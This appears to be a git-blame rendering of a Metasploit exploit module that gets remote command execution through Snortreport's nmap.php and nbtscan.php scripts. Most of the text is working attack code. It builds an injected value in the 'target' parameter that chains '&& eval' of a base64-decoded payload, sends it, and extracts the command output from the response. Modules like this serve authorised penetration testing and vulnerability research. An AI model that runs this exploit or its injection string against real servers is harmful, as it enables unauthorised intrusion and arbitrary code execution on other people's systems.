2011-10-09 06:10:18 +00:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-10-09 06:10:18 +00:00
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2011-10-15 20:10:53 +00:00
|
|
|
Rank = ExcellentRanking
|
2011-10-09 06:10:18 +00:00
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
|
super(update_info(info,
|
2011-10-15 19:56:57 +00:00
|
|
|
'Name' => 'Snortreport nmap.php/nbtscan.php Remote Command Execution',
|
2011-10-09 06:10:18 +00:00
|
|
|
'Description' => %q{
|
2011-10-09 06:12:54 +00:00
|
|
|
This module exploits an arbitrary command execution vulnerability in
|
|
|
|
|
nmap.php and nbtscan.php scripts.
|
|
|
|
|
},
|
2011-10-09 06:10:18 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'Paul Rascagneres' #itrust consulting during hack.lu 2011
|
|
|
|
|
],
|
2012-06-28 00:44:01 -05:00
|
|
|
'References' =>
|
|
|
|
|
[
|
2016-07-15 12:00:31 -05:00
|
|
|
['OSVDB', '67739'],
|
2012-12-10 11:42:21 -06:00
|
|
|
['URL', 'http://www.symmetrixtech.com/articles/news-016.html']
|
2012-06-28 00:44:01 -05:00
|
|
|
],
|
2011-10-09 06:10:18 +00:00
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Compat' =>
|
|
|
|
|
{
|
|
|
|
|
'PayloadType' => 'cmd',
|
2015-08-10 17:12:59 -05:00
|
|
|
'RequiredCmd' => 'generic perl ruby telnet python',
|
2011-10-09 06:10:18 +00:00
|
|
|
}
|
|
|
|
|
},
|
2013-09-24 12:33:31 -05:00
|
|
|
'Platform' => %w{ linux unix },
|
2011-10-09 06:10:18 +00:00
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
|
'Targets' => [['Automatic',{}]],
|
2020-10-02 17:38:06 +01:00
|
|
|
'DisclosureDate' => '2011-09-19',
|
2011-10-09 06:10:18 +00:00
|
|
|
'DefaultTarget' => 0
|
|
|
|
|
))
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
OptString.new('URI', [true, "The full URI path to nmap.php or nbtscan.php", "/snortreport-1.3.2/nmap.php"]),
|
2017-05-03 15:42:21 -05:00
|
|
|
])
|
2011-10-09 06:10:18 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def exploit
|
2011-10-09 20:31:51 +00:00
|
|
|
base64_payload = Rex::Text.encode_base64(payload.encoded)
|
2011-10-09 06:10:18 +00:00
|
|
|
|
|
|
|
|
start = "127.0.0.1 && echo XXXXX && eval $(echo "
|
|
|
|
|
last = " | base64 -d) && echo ZZZZZ"
|
|
|
|
|
custom_payload = start << base64_payload << last
|
|
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
2012-11-08 17:42:48 +01:00
|
|
|
'uri' => normalize_uri(datastore['URI']),
|
2011-10-09 06:10:18 +00:00
|
|
|
'vars_get' =>
|
|
|
|
|
{
|
|
|
|
|
'target' => custom_payload
|
|
|
|
|
}
|
|
|
|
|
},10)
|
|
|
|
|
|
|
|
|
|
if (res)
|
|
|
|
|
to_print=false
|
|
|
|
|
already_print=false
|
|
|
|
|
part=res.body.gsub("<BR>","")
|
|
|
|
|
part.each_line do |line|
|
|
|
|
|
if line =~ /ZZZZZ/
|
|
|
|
|
to_print=false
|
|
|
|
|
end
|
|
|
|
|
if to_print == true
|
|
|
|
|
print(line)
|
|
|
|
|
end
|
|
|
|
|
if line =~ /XXXXX/
|
|
|
|
|
already_print=true
|
|
|
|
|
to_print=true
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
if already_print == false
|
|
|
|
|
print_error("This server may not be vulnerable")
|
|
|
|
|
end
|
|
|
|
|
else
|
|
|
|
|
print_error("No response from the server")
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
end
|
